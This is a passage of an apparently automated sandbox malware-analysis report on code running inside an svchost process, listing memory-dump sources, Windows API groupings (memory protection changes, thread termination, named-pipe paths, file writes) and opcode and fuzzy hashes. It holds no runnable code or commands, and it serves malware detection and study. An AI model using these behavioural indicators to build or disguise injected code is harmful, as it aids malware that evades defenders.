                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 9b70d1ecbf1139e5dff184a89166bf11fbe9f0091192ee896d3ba2c320ab6499
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: 4D011765B11B4087EB249B61E84D71A72A8AB4BF46F080028CA4E273A4EF3DC54CC782
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID: _$6Z
                                                          • API String ID: 2933794660-452956228
                                                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction ID: 09d662e5f67425faa2426f8c002c97408ee2dad5bf4657b9bd0cc106bfb4ecef
                                                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction Fuzzy Hash: 50115A26B10F048AFB00DF60E85D3A833A4F71AB58F440E21DA5E97754DF7CC1588341
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 04f708c2cc00568c8c93436304c1e2414141781b11ab3e3701c71d244ff32fbf
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 29F04F72B04A8593EB208B61F5CC3597375F746F89F8C4021DA4A57954DF6CC69DCB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction ID: c36395cbba2f7c9cab4dbe5683d5b26fd9f757fb1dbd079cfaaeac44d0e0afa6
                                                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                          • Instruction Fuzzy Hash: D9F08C64B04B8083EA048B13B91D219B269BB4AFC1F8C8430EE4B27B18CF6CC4498701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction ID: 70ab6fa0bba61b1abcbd251998a6a3394bebcc369c9fa9f57e40477172e4f5eb
                                                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                          • Instruction Fuzzy Hash: 63F09661B0060143EA108B54985E3593368EB47F61F5C0619DA6B6B5E4CF2CC44CC341
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction ID: 7f00b171df67a85d5c29ec87981b708a1dced5486be2c891d81cff1721883d8f
                                                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                          • Instruction Fuzzy Hash: F9020B32619B8486EB60CB05F49835AB7E4F3C6B95F140015EACE97BA8DF7CC488CB41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: d9d923407056e679629dfec41f53747ac3185b939386cc03978ddc61ea24e902
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: DF51CE35B046018BE724CB26A54CA5AB3E8F38AF81F584029DE5B63B54DF3DC909CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction ID: b97430315ecd66362444c0c209b691b70b1b441293f497608c0ab2486a684d2f
                                                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                          • Instruction Fuzzy Hash: C051A136B14A1187EB24DF26A54CA1A73E8F38AF85F484119DD4B63754DF3DC849CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction ID: d5d08af27fbf266ffb0255115ca435791e015f7d87f3644beaa2d82d73452d82
                                                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                          • Instruction Fuzzy Hash: E161DC32A29A84C7E760CB15E45C31AB7E8F389B45F140115FA8E93BA8DF7CC548CB42
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: 24ef5facc02a821d60bac293c2cdd008fd7ac67383188b3ff3d8a6e4898980ff
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: 56112E26B0574097EB24CB61E40C61A77B8FB46F85F08012ADA8E13794EF7DC958C785
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 2395640692-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 0dbb33636f4aa29481ef908d38fbb0c69ffa5213cfb07c33621622ef40c5ca79
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: B151BB32F116008BEB54CB15E04CB6977DAE356F99F188260EA8B67788DF7CC849D781
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: a53e6054c238db8a0a468d1f03734e917ee5925ff3720cd49feaeebe880c173b
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 07515932F042808BEB648B21D54C75877ACEB56F95F1C8116EA9947BA5CF3CC4A8CB42
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 2bfff28e4bdb93d1066c74441c78e34621d0fb67657b1dd7a2dab7df0fb74e7f
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: 7E61B532A04BC482DB608F15F44879AB7E4F786B95F084215EBCA27B65DF3CC194CB41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction ID: e3a5e97954f67e6a1c8d0c8f3c508dd41d5073ae2f560c16e384641fd02a6191
                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                          • Instruction Fuzzy Hash: 61516D32B006808BEB748F15A54C35877E9F356F96F194116DA8BA7BA5CF3CC458C782
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U$_$6Z
                                                          • API String ID: 442123175-928044984
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 3c18a2099e6c7607a8c850b194b1febbd0db2b2db086b31b6252ac2fd1ae9116
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 7E411932B25A8087EB10DF65E40D79AB7A8F34AB94F584121EE4E97794EF7CC409C741
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction ID: d52aa0bc1e528004bbd25824ae56c6a8c8689a2f7ecc8b630764f68c99525a19
                                                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                          • Instruction Fuzzy Hash: 83118121B1078197FB10DB25E80D79A62E8F74AF81F884425AE4AA3694EF6CC94DC781
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
                                                          • String ID: _$6Z
                                                          • API String ID: 838830666-452956228
                                                          • Opcode ID: 5d73ba4cf61c258e47cb3bab5a4b974cfb05aa9f852afdb55bf25e222216e53e
                                                          • Instruction ID: 2ea59cd195b9cf113dc22e59ecb6197495d658d470353f851a0b0b9b4abbc984
                                                          • Opcode Fuzzy Hash: 5d73ba4cf61c258e47cb3bab5a4b974cfb05aa9f852afdb55bf25e222216e53e
                                                          • Instruction Fuzzy Hash: 8821D634B05B0083FB40AB18F86D35876A8F786B44F984125D98FA77A1DF3CC54D9782
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction ID: 5726c44e6c94a0261d76dd1d18cec12993198ee48d381ce34b9c54260b87f620
                                                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                          • Instruction Fuzzy Hash: 64011332A10A90DAEB15DF66A80D24977B9F78AF84B094025DF4A63728DF38D495C741
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002A6613128DF), ref: 000002A661312A12
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleMode
                                                          • String ID:
                                                          • API String ID: 4145635619-0
                                                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction ID: 99fcf29c5a3e963d5d89bff97ca9893eee29e122c75244328e6b095d4ae27092
                                                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                          • Instruction Fuzzy Hash: E991BD32B106548AFB609F75995E3AD3BA8F357F98F684106DE4B73A85DF38C4498302
                                                          APIs
                                                            • Part of subcall function 000002A66130E22C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,000002A66130E578), ref: 000002A66130E256
                                                          • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,000002A66130E6A9), ref: 000002A66130E95B
                                                          • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,000002A66130E6A9), ref: 000002A66130E99F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CodeInfoPageValid
                                                          • String ID: _$6Z
                                                          • API String ID: 546120528-452956228
                                                          • Opcode ID: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
                                                          • Instruction ID: 3b70e38f7f3651a8aed1fd291ae84bff09093ca3b1c53edec682f9b410165f4d
                                                          • Opcode Fuzzy Hash: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
                                                          • Instruction Fuzzy Hash: 1F81DDA2B0878087F7748F26A44C369B7E9B34AF41F0C4126D69B67691DF3DC589C382
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
